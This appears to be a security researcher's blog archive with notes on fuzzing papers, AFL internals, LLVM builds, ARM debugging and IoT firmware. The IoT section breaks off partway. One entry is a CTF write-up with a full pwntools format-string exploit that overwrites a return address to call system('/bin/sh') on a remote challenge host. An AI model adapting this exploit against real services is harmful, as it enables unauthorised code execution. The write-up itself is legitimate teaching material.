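This paper is a Distinguished Paper of Usenix 18. It optimizes three aspects of current concolic execution: slow symbolic emulation, ineffective snapshots, and slow and inflexible sound analysis, so that concolic execution fits the fuzzing scenario better.

Motivation: Performance Bottlenecks

Slow Symbolic Emulation

Mainstream concolic executors perform symbolic execution on an intermediate representation (IR), such as LLVM IR for KLEE and VEX IR for angr, and emulate the IR. They use an IR because it is simpler to implement. The Intel 64-bit instruction set contains 1795 instructions, so writing down symbolic semantics for every instruction by hand is a huge amount of work, whereas an IR has few instructions (LLVM IR has 62), which are comparatively easy to handle symbolically.

However, using an IR introduces additional overhead. First, translating machine instructions to IR has a cost of its own. Since amd64 is a CISC (complex instruction set computer) architecture while the IR is RISC-like (reduced instruction set computer), one amd64 instruction is usually translated into several IR instructions. Taking angr as an example, translating amd64 instructions to VEX IR increases the number of instructions by a factor of 4.69 on average. Second, using an IR leads to taint tracking at basic block level. For efficiency reasons, the translation from native instructions to IR is usually done one basic block at a time, so a single native instruction cannot be translated on its own. The executor can therefore only decide which basic blocks need to be executed symbolically, not which individual instructions. As a consequence, if only one instruction in a basic block depends on the input, the whole basic block still has to be emulated symbolically, which causes a high overhead. Without an IR, taint tracking can be done at instruction level: it is clear which instructions need symbolic emulation and which can simply run natively, which avoids unnecessary symbolic emulation. Experiments show that only 30% of the instructions in a basic block need symbolic emulation.

Ineffective Snapshot

Snapshotting is a common technique in concolic execution. It saves the state S before a branch, so that when that branch finishes or gets “stuck”, execution can continue with the other branch directly from S, avoiding the overhead of re-execution. However, snapshots have drawbacks of their own. A snapshot has to preserve external state (the file system, the memory management system), so system calls that affect external state must be handled. There are generally two approaches: full-system concolic execution and external environment modeling. Both have shortcomings. The first is hard to implement and has high overhead because the external environment is complex. The second models only a small number of system calls, and some of them incompletely. In addition, inputs produced by fuzzing usually do not share a common branch, so snapshots are not a good fit for the fuzzing scenario. The paper therefore does not use snapshots: every input is re-executed from the start, and system calls are executed concretely.

Slow and Inflexible Sound Analysis

Current concolic execution tries to satisfy all the constraints along a path in order to solve for a concrete input. However, complex constraints may make the input unsolvable. One solution in this paper is therefore to solve only a part of the constraints.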

FAIRFUZZ: A Targeted Mutation Strategy for Increasing Greybox Fuzz Testing Coverage(ASE 18)

FairFuzz focuses on branch coverage. It works in two main steps.

First, it identifies the program branches that are rarely hit by previously generated inputs. It calls such branches rare branches. These rare branches guard under-explored functionality of the program. By generating more random inputs hitting these rare branches, FairFuzz greatly increases the coverage of the parts of the code guarded by them.

Second, FairFuzz uses a novel lightweight mutation technique to increase the probability of hitting these rare branches. The mutation strategy is based on the observation that certain parts of an input already hitting a rare branch are crucial to satisfy the conditions necessary to hit that branch. Therefore, to generate more inputs hitting the rare branch via mutation, the parts of the input that are crucial for hitting the branch should not be mutated.
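
The second step can be sketched as follows. This is a simplified illustration rather than FairFuzz's actual mask computation. It flips one byte at a time and records the offsets where the mutated input still reaches the branch. Both hits_magic_branch and the RIFF magic value are hypothetical stand-ins for running the instrumented target.

```python
def mutable_positions(data, hits_branch):
    """Return the byte offsets that can be changed while still hitting the branch."""
    positions = []
    for i in range(len(data)):
        mutated = bytearray(data)
        mutated[i] ^= 0xFF  # flip every bit of one byte
        if hits_branch(bytes(mutated)):
            positions.append(i)
    return positions

# Hypothetical rare branch: taken only when the input starts with a magic value.
def hits_magic_branch(data):
    return data[:4] == b"RIFF"

print(mutable_positions(b"RIFFdata", hits_magic_branch))  # [4, 5, 6, 7]
```

Later mutations would then be restricted to the returned offsets, so that the magic value guarding the rare branch stays intact.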

Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing(oakland 19)

ProFuzzer: On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery(oakland 19)

paper

NEUZZ: Efficient Fuzzing with Neural Program Smoothing(oakland 19)

paper
code

REDQUEEN: Fuzzing with Input-to-State Correspondence(NDSS 19)

paper
code

NAUTILUS: Fishing for Deep Bugs with Grammars(NDSS 19)

paper
code

Send Hardest Problems My Way: Probabilistic Path Prioritization for Hybrid Fuzzing(NDSS 19)

paper

EnFuzz: Ensemble Fuzzing with Seed Synchronization among Diverse Fuzzers(Usenix Security 19)

paper
code

MOPT: Optimize Mutation Scheduling for Fuzzers(Usenix Security 19)

paper
code

GRIMOIRE: Synthesizing Structure while Fuzzing(Usenix Security 19)

paper
code

Directed Fuzzing

Directed Greybox Fuzzing(CCS 17)

paper
code

Input: Seed Input S

repeat
    s = CHOOSENEXT(S)
    p = ASSIGNENERGY(s)    // the focus of this paper
    for i from 1 to p do
        s' = MUTATE_INPUT(s)
        if s' crashes then
            add s' to Sx
        else if ISINTERESTING(s') then
            add s' to S
        end if
    end for
until timeout reached or abort-signal

Output: Crashing Inputs Sx

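The general steps of AFL-like fuzzing are shown above. The paper focuses on the ASSIGNENERGY(s) operation: it assigns different energy to different seeds s. If the trace produced by a seed s’ is close to the target basic block targetB, its energy p is larger, and more mutations are performed on seed s’. The paper has two main contributions: an algorithm for computing the distance between the trace of a seed s’ and targetB, and a simulated annealing algorithm for assigning energy to each seed s.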
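
A minimal sketch of an annealing-style energy assignment is given below. The exponential cooling schedule and the constants (20, 10, 5) follow my recollection of the AFLGo paper and should be treated as assumptions, as should the function name and the idea of returning a multiplicative factor on the base energy.

```python
def annealing_energy_factor(distance, elapsed, exploit_after):
    """Factor applied to a seed's base energy.

    distance:      normalized seed distance in [0, 1], 0 = closest to the target
    elapsed:       time spent fuzzing so far
    exploit_after: time at which the schedule should mostly exploit
    """
    temperature = 20.0 ** (-elapsed / exploit_after)  # cools from 1 towards 0
    # Early on (temperature near 1) every seed gets p = 0.5 (exploration);
    # later p approaches 1 - distance (exploitation of close seeds).
    p = (1.0 - distance) * (1.0 - temperature) + 0.5 * temperature
    return 2.0 ** (10.0 * p - 5.0)

for t in (0, 30, 60, 600):
    near = annealing_energy_factor(0.1, t, 60)
    far = annealing_energy_factor(0.9, t, 60)
    print(t, round(near, 3), round(far, 3))
```

At time 0 near and far seeds receive the same factor, and as the temperature drops the seeds closer to the target receive more and more of the mutation budget.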

Hawkeye: Towards a Desired Directed Grey-box Fuzzer(CCS 18)

paper
source code has not been found.

Desired Properties of Directed Fuzzing

P1. The DGF should define a robust distance-based mechanism that can guide the directed fuzzing by avoiding the bias to some traces and considering all traces to the targets.
P2. The DGF should strike a balance between overheads and utilities in static analysis.
P3. The DGF should select and schedule the seeds to rapidly reach target sites. AFL determines how many new inputs(i.e., “energy”) should be generated from a seed input to improve the fuzzing effectiveness(i.e., increase the coverage); this is termed “power scheduling”.
P4. The DGF should adopt an adaptive mutation strategy when the seeds cover the different program states. The desired design is that when a seed has already reached the target sites(including target lines, basic blocks or functions), it should be given less chances for coarse-grained mutations(e.g., chunk replacement).

AFLGo’s Solution

For P1. AFLGo simply picks the shortest path, but the shortest path may not be able to trigger a given vulnerability.
For P2. AFLGo only considers the explicit call graph information. As a result, function pointers are treated as external nodes, which are ignored during distance calculation. Besides, AFLGo counts the same callee in its callers only once, and it does not differentiate multiple call patterns between the caller and callee.
For P3. AFLGo applies a simulated annealing based power scheduler: it favors those seeds closer to the targets by assigning more energy to them to be mutated; the applied cooling schedule initially assigns a smaller weight to the effect of “distance guidance”, until it reaches the “exploitation” phase. The issue is that there is no prioritization procedure, so newly generated seeds with a smaller distance may wait for a long time to be mutated.
For P4. The mutation operators of AFLGo come from AFL’s two non-deterministic strategies: 1) havoc, which performs purely random mutations such as bit flips, bytewise replacement, etc; 2) splice, which generates seeds from some random byte parts of two existing seeds. Notably, during runtime AFLGo excludes all the deterministic mutation procedures and relies purely on the power scheduling on havoc/splice strategies.

Suggestions to improve DGFs:

For P1, a more accurate distance definition is needed to retain trace diversity, avoiding the focus on short traces.
For P2, both direct and indirect calls need to be analyzed; various call patterns need to be distinguished during static distance calculation.
For P3, a moderation to the current power scheduling is required. The distance-guided seed prioritization is also needed.
For P4, the DGF needs an adaptive mutation strategy, which optimally applies fine-grained and coarse-grained mutations when the distance between the seed and the targets is different.

Hawkeye’s Design

During fuzzing, the fuzzer selects a seed from a priority seed queue. It then applies power scheduling to the seed, with the goal of giving seeds that are considered “closer” to the target sites more mutation chances, i.e., energy. Specifically, this is achieved through a power function, which combines the covered function similarity and the basic block trace distance. For each new test seed generated during mutation, after capturing its execution trace, the fuzzer calculates the covered function similarity and the basic block trace distance based on the utilities. For each input execution trace, the basic block trace distance is the accumulated basic block level distance divided by the total number of executed basic blocks; the covered function similarity is calculated from the overlap between the currently executed functions and the target function trace closure, as well as the function level distance.
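The basic block trace distance described above is a plain average, which a short Python sketch can make concrete. The function name, the block labels and the per-block distance table are hypothetical; the sketch also assumes every executed block already has a precomputed distance, which the text does not state.

```python
from typing import Mapping, Sequence


def bb_trace_distance(trace: Sequence[str], bb_distance: Mapping[str, float]) -> float:
    """Accumulated basic-block distance divided by the number of executed blocks."""
    if not trace:
        raise ValueError("the execution trace is empty")
    # Assumption: every executed block has an entry in bb_distance.
    return sum(bb_distance[bb] for bb in trace) / len(trace)


# Hypothetical distances from three blocks to the target site.
distances = {"entry": 3.0, "parse": 2.0, "check": 1.0}
average = bb_trace_distance(["entry", "parse", "check"], distances)
```

A seed whose trace stays on blocks with small distances gets a small average, which is what the power function rewards with more energy.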

After the energy is determined, the fuzzer adaptively allocates mutation budgets on two different categories of mutations according to mutators’ granularities on the seed(coarse-grained mutations and fine-grained mutations). Afterwards, the fuzzer evaluates the newly generated seeds to prioritize those that have more energy or that have reached the target functions.

Fuzzing Machine Learning Model

TensorFuzz: Debugging Neural Networks with Coverage-Guided Fuzzing(18)

Coverage-Guided Fuzzing for Deep Neural Networks(18)

Kernel Fuzzing

RAZZER: Finding Kernel Race Bugs through Fuzzing(oakland 19)

kAFL: Hardware-Assisted Feedback Fuzzing for OS Kernels(Usenix Security 17)

Fuzzing File Systems via Two-Dimensional Input Space Exploration(oakland 19)

PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary(NDSS 19)

Anti-Fuzzing

FUZZIFICATION: Anti-Fuzzing Techniques(Usenix 19)

ANTIFUZZ: Impeding Fuzzing Audits of Binary Executables(Usenix 19)

IoT Fuzzing

IOTFUZZER: Discovering Memory Corruptions in IoT Through App-based Fuzzing(NDSS 18)

FIRM-AFL: High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation(Usenix Security 19)

Evaluate Fuzzing

Evaluating Fuzz Testing(CCS 18)

They found that:

Most papers failed to perform multiple runs, and those that did failed to account for varying performance by using a statistical test.
Many papers measured fuzzer performance not by counting distinct bugs, but instead by counting “unique crashes” using heuristics such as AFL’s coverage measure and stack hashes.
Many papers used short timeouts, without justification.
Many papers did not carefully consider the impact of seed choices on algorithmic improvements.
Papers varied widely on their choice of target programs.

os tutorial

2018-09-28T01:17:19.000Z

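I had long wanted to understand how an OS works, and while browsing GitHub I came across os-tutorial, a project well suited to beginners who want to learn about operating systems and build one by hand. I am bookmarking it here; the project is still being updated.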

llvm gold build

2018-09-27T23:30:17.000Z

Binutils Building

Download binutils source code

git clone --depth 1 git://sourceware.org/git/binutils-gdb.git binutils

Build binutils

mkdir build
cd build
../binutils/configure --enable-gold --enable-plugins --disable-werror
sudo make install

LLVMgold.so build

Download LLVM source code

git clone https://github.com/llvm-mirror/llvm.git

Build LLVM with gold-plugin

mkdir build
cd build
cmake ../llvm -DLLVM_BINUTILS_INCDIR="path/to/binutils/include"
make -j$(nproc)

And the LLVMgold.so will appear in the lib folder.

Copy

sudo cp lib/LLVMgold.so /usr/local/lib
sudo mkdir /usr/lib/bfd-plugins
sudo cp lib/LLVMgold.so /usr/lib/bfd-plugins
sudo cp lib/libLTO.so /usr/lib/bfd-plugins

Adding a sanitizer to LLVM

2018-08-28T20:24:13.000Z

Sometimes you need to add your own sanitizer to the LLVM compiler. For example, if the sanitizer is called Bitype and should be enabled with -fsanitize=bitype, the following steps are required:

Add SANITIZER("bitype", Bitype) to clang/Basic/Sanitizers.def
Add a needsBitypeRt function to clang/Driver/SanitizerArgs.h
In clang/lib/Driver/ToolChain.cpp, add Bitype to Res in the getSupportedSanitizers() function

afl fork server

2018-08-07T00:25:14.000Z

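Preface

A common way to fuzz a library that parses data is to pick a simple binary that exercises the library and run it repeatedly on generated inputs. The fuzzer usually creates a child process with fork and execve to run the target binary and waits for it to exit with waitpid(). If the child is terminated by a signal such as SIGSEGV or SIGABRT, it has crashed, which may indicate a memory corruption bug. However, calling execve() for every input repeats program linking, library initialization and similar work each time, which greatly reduces fuzzing efficiency [1]. AFL inserts fork server logic into the target program so that linking and library initialization happen only once during fuzzing, and it relies on the copy-on-write behavior of fork() to greatly improve efficiency.

fork server

The fork server code inserted into the binary runs before main. It pauses and waits for a request from the AFL fuzzer. Once the fuzzer "gives the order", the fork server calls fork() to create a child process, which continues into main. Because the fork server has already loaded all the resources, each child only needs to execute the code of main.

The example above is defined in afl-llvm-rt.o.c in AFL's llvm_mode folder. The fork server logic is fairly simple: a while loop reads the data sent by AFL from FORKSRV_FD, which is one end of a pipe used to read data from the AFL side. When data arrives, AFL's input is ready, so the fork server calls fork() to create a child process that runs main for this fuzzing iteration.

The AFL process and the fuzzed process are not parent and child (AFL is the parent of the fork server, and the fork server is the parent of the fuzzed process). AFL therefore communicates with the fork server through pipes; the fork server waits for the fuzzed child with waitpid(), obtains its exit status, and sends that status back to AFL through a pipe.

The pipes are initialized in the init_forkserver function in afl-fuzz.c, for those who are interested.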
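The handshake described above can be imitated in a few lines of Python. This is only a sketch of the idea, not AFL's C implementation: the function names, the use of a temporary file as the input channel and the 4-byte message format are assumptions made for illustration, and the pipes are ordinary os.pipe() descriptors instead of the fixed FORKSRV_FD.

```python
import os
import struct
import tempfile


def fork_server(ctl_r, st_w, target):
    """Server loop: wait for a 4-byte request, fork one child, report its status."""
    while True:
        if len(os.read(ctl_r, 4)) != 4:      # control pipe closed: the fuzzer is gone
            os._exit(0)
        pid = os.fork()
        if pid == 0:                          # child: run the target exactly once
            try:
                target()
            finally:
                os._exit(0)
        os.write(st_w, struct.pack("<i", pid))
        _, status = os.waitpid(pid, 0)        # raw wait status of the child
        os.write(st_w, struct.pack("<i", status))


def start_server(target):
    """Fuzzer side: create the control and status pipes, then fork the server."""
    ctl_r, ctl_w = os.pipe()
    st_r, st_w = os.pipe()
    server = os.fork()
    if server == 0:
        os.close(ctl_w)
        os.close(st_r)
        fork_server(ctl_r, st_w, target)      # never returns
    os.close(ctl_r)
    os.close(st_w)
    return server, ctl_w, st_r


def run_once(ctl_w, st_r):
    """Ask the server for one execution and return (child pid, wait status)."""
    os.write(ctl_w, b"\0" * 4)
    (pid,) = struct.unpack("<i", os.read(st_r, 4))
    (status,) = struct.unpack("<i", os.read(st_r, 4))
    return pid, status


def demo():
    """Run a toy target on a harmless input and on a crashing one."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        path = f.name

    def target():                             # hypothetical target: aborts on "BUG"
        with open(path, "rb") as fh:
            if fh.read().startswith(b"BUG"):
                os.abort()

    server, ctl_w, st_r = start_server(target)
    statuses = []
    for data in (b"hello", b"BUG!"):
        with open(path, "wb") as fh:
            fh.write(data)
        statuses.append(run_once(ctl_w, st_r)[1])
    os.close(ctl_w)                           # EOF on the control pipe stops the server
    os.close(st_r)
    os.waitpid(server, 0)
    os.unlink(path)
    return statuses
```

The fuzzer never calls waitpid() on the fuzzed process itself; it only sees the status the server forwards, which it can inspect with os.WIFSIGNALED() to detect a crash.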

References

[1] Fuzzing random programs without execve(). https://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html

AFL Fuzzing with ASAN

2018-07-31T15:05:45.000Z

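Preface

AFL is a widely used fuzzing tool, and ASAN (AddressSanitizer) is a very efficient memory error detector from Google. It can detect use-after-free, heap and stack buffer overflows, use-after-return, use-after-scope, initialization order bugs and memory leaks. Both have LLVM-based versions, so combining them works very well.

Problem

While fuzzing Heartbleed with AFL and ASAN (following the afl-training tutorial), I ran into a problem: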

Since it seems to be built with ASAN and you have a
    restrictive memory limit configured, this is expected; please read
    /usr/local/share/doc/afl/notes_for_asan.txt for help

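This happens because ASAN tracks all memory, so in theory it may need a lot of it. On 32-bit systems it uses at most a little over 800 MB. On 64-bit systems, the theoretical maximum for ASAN's shadow memory is 17.5 TB or 20 TB; ordinary machines do not have that much memory, so the machine could hang. AFL therefore reports this error when a 64-bit program runs on a 64-bit machine. The notes referenced in the message also describe how to handle this case.

In practice, that maximum is only theoretical, and the shadow memory of a typical program takes far less. The first solution is therefore to pass -m none, which disables the memory limit and avoids this error:

afl-fuzz -i in -o out -m none ./executable

The second solution is to use cgroups to limit the resources the program can use:

sudo ~/afl/experimental/asan_cgroups/limit_memory.sh -u username afl-fuzz -i in -o out -m none ./executable

The second solution is the safer one and does not affect the system much, because it caps the memory the program can use.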

A Format String Exploit (Format String Not on the Stack)

2018-07-29T18:50:37.000Z

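Preface

Over the past two days I worked on a CTF challenge (binary linked). Its logic is very simple: it accepts input and prints it with printf, which is clearly a format string vulnerability. Because the format string is not on the stack, exploitation is a little harder, so I am recording my approach here.

Format string vulnerabilities

Format string functions accept a variable number of arguments and treat the first argument as the format string, which determines how the remaining arguments are interpreted.

A format string vulnerability usually occurs because the format string argument is not fixed (or can be modified), which gives the attacker control over the format string and, through it, arbitrary memory reads and writes. Functions that can trigger it include scanf, printf, vprintf, vfprintf, sprintf, vsprintf, vsnprintf, setproctitle, syslog and others. For a more systematic introduction, see the ctf-wiki article listed in the references.

Program analysis

First, check the protections enabled on the binary:

All protections except the stack canary are enabled (the input buffer is not on the stack, so there is no canary protecting it; this does not mean the return address can be overwritten with a buffer overflow -_-).

Then load it into IDA Pro to analyze its logic:

The program logic is very simple. It gives you three chances to perform a format string attack; COUNT is a global variable with COUNT=3. The exploit_me function is even simpler: it first clears the BUFF variable, reads 13 bytes, and then prints the input string, which is where the format string attack happens. BUFF is a global variable of 16 bytes. Exploiting the program has the following main difficulties:

The input length is limited (only 13 bytes) and only three attempts are allowed
The format string is not on the stack, which makes arbitrary memory reads and writes harder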

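Exploitation

The following addresses the two difficulties above.

Modifying the counter variable

Because only three inputs are allowed and each is short, an effective attack is hard to mount directly. The idea is to first use these three inputs to overwrite the counter that limits the number of inputs, so that many more inputs become possible.

As the program analysis above shows, there are two counter variables: the local variable MACRO_COUNT and the global variable COUNT. Changing either one allows more inputs and makes the rest of the attack easier. The plan is:

Leak addresses: both a stack address and a program address.
Modify the stack: make sure the stack contains the address of MACRO_COUNT or COUNT.
Modify the value of MACRO_COUNT or COUNT.

Each of these goals can be achieved with one format string attack.

Leaking addresses

The figure above shows the stack just before the call to printf. The first argument is the address of the format string, and the next memory cell, 0xffffcf6c, also stores the address of the format string, so leaking its content reveals the address of BUFF, from which the program base can be computed. Next, the cell at ebp holds the saved ebp, the ebp value of the calling function, which is a stack address, so leaking it reveals a stack address. The input

%p%6$p

therefore leaks both the stack address and the program address.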

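Modifying the stack contents

Because the format string is not on the stack, modifying a memory cell through it requires first getting that cell's address onto the stack. From the analysis above we know a stack address and a program address, and can compute the addresses of MACRO_COUNT and COUNT from offsets. Next, the address of MACRO_COUNT or COUNT has to be written onto the stack. I chose to write the address of MACRO_COUNT, for the following reason:

As the figure above shows, the cell at 0xffffcf84 stores the address 0xffffd044, and the cell at 0xffffd044 stores 0xffffd224, which is also a stack address. MACRO_COUNT is a stack variable too, so the upper 16 bits of its address should equal those of 0xffffd224, and only the lower 16 bits of the value stored at 0xffffd044 need to change. This keeps the attack practical: overwriting all 32 bits would print a huge number of characters and take a long time, and the input string would also become too long to fit.

Concretely, the attack changes the lower 16 bits of the value stored at 0xffffd044 to those of the address of MACRO_COUNT's high byte.

Let addr be the address of MACRO_COUNT.
The input is then

"%" + str(addr & 0xffff) + "d" + "%9$hn"

Modifying the value of MACRO_COUNT

After the previous step, the cell at 0xffffd044 (which previously held 0xffffd224) stores the address of MACRO_COUNT. The offset of 0xffffd044 from 0xffffcf60 (the first argument of printf) is 0xE4, so the following input sets the high byte of MACRO_COUNT to 0xFF:

"%255d%57$hhn"

Here 57 is 0xE4/4, because each address is 4 bytes.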
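The index arithmetic used for %9$hn and %57$hhn can be checked with a small Python sketch. The helper names and the default 13-byte limit check are illustrative assumptions; the addresses are the ones quoted in this write-up, and whether the 13 bytes include a trailing newline is not something the text specifies.

```python
def arg_index(first_arg_addr: int, slot_addr: int, word: int = 4) -> int:
    """Positional index k such that %k$... refers to the stack slot at slot_addr."""
    offset = slot_addr - first_arg_addr
    if offset <= 0 or offset % word:
        raise ValueError("slot must lie above the first argument, word-aligned")
    return offset // word


def write_payload(count: int, index: int, width: str = "hn", limit: int = 13) -> str:
    """Build '%<count>d%<index>$<width>' and reject payloads longer than limit."""
    payload = "%{}d%{}${}".format(count, index, width)
    if len(payload) > limit:
        raise ValueError("payload is %d bytes, limit is %d" % (len(payload), limit))
    return payload


FIRST_ARG = 0xffffcf60                                # first argument of printf
idx_pointer = arg_index(FIRST_ARG, 0xffffcf84)        # slot that holds 0xffffd044
idx_target = arg_index(FIRST_ARG, 0xffffd044)         # slot that was just rewritten
payload = write_payload(255, idx_target, "hhn")
```

The length check matters here because a 16-bit count can need five digits, which leaves very little room inside a 13-byte input.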

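Reading and writing arbitrary memory

With the work above, we can now send many inputs. Because the format string is a global variable and not on the stack, a single simple input cannot read or write arbitrary memory; instead, format strings are used to indirectly place the desired address onto the stack. The idea is as follows:

Suppose I want to write an address addr into some stack cell whose address is stack_addr. This requires an intermediate step.

Let us look again at the stack layout when printf is called:

The cells at 0xffffcf84 and 0xffffcf88 both hold stack addresses, and each of those in turn points to another stack address. A format string can therefore change the content at 0xffffd044 to stack_addr+2 and the content at 0xffffd04c to stack_addr, and then use $hn to write the upper 16 bits of addr ((addr&0xffff0000)>>16) to stack_addr+2 and the lower 16 bits (addr&0xffff) to stack_addr.

The attack proceeds as follows: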

def modify(address, modifiedAddress):
    # Write the 32-bit value modifiedAddress into the stack cell at address,
    # 16 bits at a time, through the pointer chains behind arguments 9/57 and 10/59.
    print("modified address is %x" % modifiedAddress)
    modifiedAddress_high = (modifiedAddress & 0xffff0000) >> 16
    modifiedAddress_low = modifiedAddress & 0xffff

    # Step 1: make the cell reached through argument 9 point to address + 2.
    temp_low = (address + 0x2) & 0xffff
    print("temp low is %x" % temp_low)
    payload3 = "%" + str(temp_low) + "d" + "%9$hn"
    p.sendline(payload3)
    p.recvrepeat(0.5)

    # Step 2: make the cell reached through argument 10 point to address.
    temp_high = (address) & 0xffff
    print("temp high is %x" % temp_high)
    payload4 = "%" + str(temp_high) + "d" + "%10$hn"
    p.sendline(payload4)
    p.recvrepeat(0.5)

    # Step 3: write the upper 16 bits of the value to address + 2 (argument 57).
    payload5 = "%" + str(modifiedAddress_high) + "d" + "%57$hn"
    print("got run high is %x " % (modifiedAddress_high))
    p.sendline(payload5)
    p.recvrepeat(0.5)

    # Step 4: write the lower 16 bits of the value to address (argument 59).
    payload6 = "%" + str(modifiedAddress_low) + "d" + "%59$hn"
    print("got run low is %x " % (modifiedAddress_low))
    p.sendline(payload6)
    p.recvrepeat(0.5)

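Here address is the stack_addr above and modifiedAddress is the addr above.

With the ability to write any address onto the stack, we can leak a libc address and overwrite the return address and its argument.

Leaking a libc address

Using the method above, we can write the GOT address of printf onto the stack and then read the GOT entry with %s, which leaks a libc address (the full script below does this with puts).
The challenge does not provide the libc version, so the leaked address can be looked up on the libc database search site. From the leaked libc address we obtain the address of system and of the "/bin/sh" string.

Modifying the return address and argument

With the libc address leaked, overwrite the return address of main with the address of system, set its argument to the address of the "/bin/sh" string, and send EXIT to complete the attack.

The full attack script is as follows: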


from pwn import *


def modify(address, modifiedAddress):
    print("modified address is %x" % modifiedAddress)
    #puts_got_run = puts_got + binary_base
    modifiedAddress_high = (modifiedAddress & 0xffff0000) >> 16
    #log.info("strcmp got run high %x " % strncmp_got_run_high)
    modifiedAddress_low = modifiedAddress & 0xffff

    temp_low = (address + 0x2) & 0xffff
    print("temp low is %x" % temp_low)
    payload3 = "%"+str(temp_low) + "d" + "%9$hn"
    p.sendline(payload3)
    p.recvrepeat(0.5)

    temp_high = (address) & 0xffff
    print("temp high is %x" % temp_high)
    payload4 = "%" + str(temp_high) + "d" + "%10$hn"
    p.sendline(payload4)
    p.recvrepeat(0.5)

    payload5 = "%" + str(modifiedAddress_high)+"d" + "%57$hn"
    print("got run high is %x " % (modifiedAddress_high))
    p.sendline(payload5)
    # p.recv()
    # sleep(1)
    p.recvrepeat(0.5)

    payload6 = "%" + str(modifiedAddress_low)+"d"+"%59$hn"
    print("got run low is %x " % (modifiedAddress_low))
    p.sendline(payload6)
    p.recvrepeat(0.5)




#p = process('./babyformat')
pp = ELF('./babyformat')
p = remote('104.196.99.62', port = 2222)
p.recvuntil('==== Baby Format - Echo system ====')

puts_got = pp.got['puts']
# puts_offset = 0x5fca0
# bin_sh_offset = 0x15ba0b
# system_offset = 0x3ada0
system_offset = 0x3cd10
puts_offset = 0x67360
bin_sh_offset = 0x17b8cf

## leak address
p.sendline('%p%6$p')
#sleep(3)
p.recvline()
leaked = p.recvline()
addr_buff = int(leaked[2:10], 16)
binary_base = addr_buff - 0x202c 
log.info("BUFF address is %x" % addr_buff)
addr_stack_ebp = int(leaked[12:20], 16) - 0x20
log.info("ebp address is %x" % addr_stack_ebp)

#ebp_low_four = addr_stack_ebp & 0xffff

# low 16 bits of the address of MACRO_COUNT's high byte
count_low_four = (addr_stack_ebp + 0x17) & 0xffff

payload1 = "%" + str(count_low_four) + "d" + "%9$hn"
p.sendline(payload1)
p.recvrepeat(1)

payload2 = "%255d%57$hhn"
p.sendline(payload2)
p.recvrepeat(1)

####### No problem up ##############################

puts_got_run = puts_got + binary_base
modify(addr_stack_ebp + 0x20, puts_got_run)

p.recvrepeat(1)
# leak the puts address through its GOT entry
payload7 = "%14$s"
p.sendline(payload7)
# print(p.recv())
#sleep(1)
puts_address = u32(p.recvline()[0:4])
log.info("puts address is %x " % puts_address)
libc_base = puts_address - puts_offset
log.info("libc base address is %x" % libc_base)

#############leak libc address done ############

ret_address = addr_stack_ebp + 0x34
arg_address = addr_stack_ebp + 0x3c

system_address = system_offset + libc_base
bin_sh_address = bin_sh_offset + libc_base

modify(ret_address, system_address)
modify(arg_address, bin_sh_address)
#raw_input()
p.recvrepeat(1)
#p.sendline('EXIT')

p.interactive()

References

ctf-wiki, introduction to format string vulnerabilities: https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_intro/
libc database search: https://libc.blukat.me/

Debugging ARM programs on Intel Linux

2018-07-26T18:43:55.000Z

Install qemu

sudo apt-get install qemu

Install the dynamic libraries needed by ARM binaries

sudo apt-get install gcc-multilib-arm-linux-gnueabi
sudo apt-get install gcc-armhf-cross
The installed libraries are now in /usr/arm-linux-gnueabihf/lib/. Some ARM binaries are dynamically linked directly against /lib/ld-linux-armhf.so.3, so symlink /usr/arm-linux-gnueabihf/lib/ld-linux-armhf.so.3 into /lib/: sudo ln -s /usr/arm-linux-gnueabihf/lib/ld-linux-armhf.so.3 /lib/ld-linux-armhf.so.3

Run

Before running, add /usr/arm-linux-gnueabihf/lib to the LD_LIBRARY_PATH environment variable: export LD_LIBRARY_PATH=/usr/arm-linux-gnueabihf/lib/:$LD_LIBRARY_PATH
Run the ARM program with qemu-arm: qemu-arm -g 1234 /path/of/arm-executable, which waits for a debugger on port 1234

Debug

The program can now be debugged on your own machine, either remotely with IDA Pro or with gdb; gdb is described here
Before debugging, make sure gdb-multiarch is installed; if not, run sudo apt install gdb-multiarch
Open the file to debug with gdb: gdb-multiarch /path/of/arm-executable
Connect to the debug port inside gdb: target remote localhost:1234, then debug as usual

Enjoy it!!!

IoT Firmware Reverse Engineering: Getting Started

2018-07-11T00:52:27.000Z

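Preface

With the rapid growth of IoT (Internet of Things) devices, their security is drawing increasing attention. As described in [1], IoT security issues mainly include the following:

Perception layer security. The IoT perception layer mainly includes wireless sensor networks, RFID, 802.11, BLE (Bluetooth Low Energy), Zigbee, etc. These communication networks may themselves have security problems.
Network layer security. This mainly covers the security of communication protocols, privacy leakage and similar issues.
Application layer security. This mainly covers software security, authentication, protection of private data, and verification.

Their relationship is shown in the figure below:

Figure 1: IoT security overview

Because IoT devices have strict requirements on energy consumption and timeliness, their implementation (the operating system and software protection mechanisms) differs greatly from PCs and phones. Because of the energy constraints, most IoT devices use low-power processors (such as the ARM Cortex-M series). Most of these processors have no MMU, so there is no virtual-to-physical address translation, let alone protections such as ASLR (ARM Cortex-M has an MPU, which provides a rather limited memory protection mechanism). Because of the real-time requirements, most devices use an RTOS (Real Time Operating System) or run directly as a bare-metal system, and the memory layout of each device may be fixed. Application layer security on IoT devices is therefore also a serious concern.

Firmware

In IoT devices, code and data are usually stored in ROM (mostly flash; see the linked overview of flash types). This code and data are generally called firmware (the wording may be imprecise; corrections are welcome). Firmware has no fixed format; it is more like a binary blob, and its format and parsing differ from device to device.

There are three main ways to obtain firmware:

Download it from the vendor's website or obtain it by reverse engineering the vendor's app
Hijack the firmware update process (man-in-the-middle attack)
Hardware reverse engineering: read the flash that stores the firmware directly, or debug over the UART serial port

Many IoT devices now use Over-The-Air firmware updates, so many vendors do not offer firmware downloads on their websites, and the most generally applicable way to obtain firmware is hardware reverse engineering. On that topic I recommend two articles: 物联网硬件安全分析基础-固件提取 (IoT hardware security analysis basics: firmware extraction) and 物联网硬件安全分析基础-串口调试 (IoT hardware security analysis basics: serial port debugging).

Reverse engineering firmware

While reading material on firmware reverse engineering recently, I ran into the following problems:

It is unclear which parts are code and which are data
The memory layout is unknown, i.e., the base address of the firmware is unknown
……

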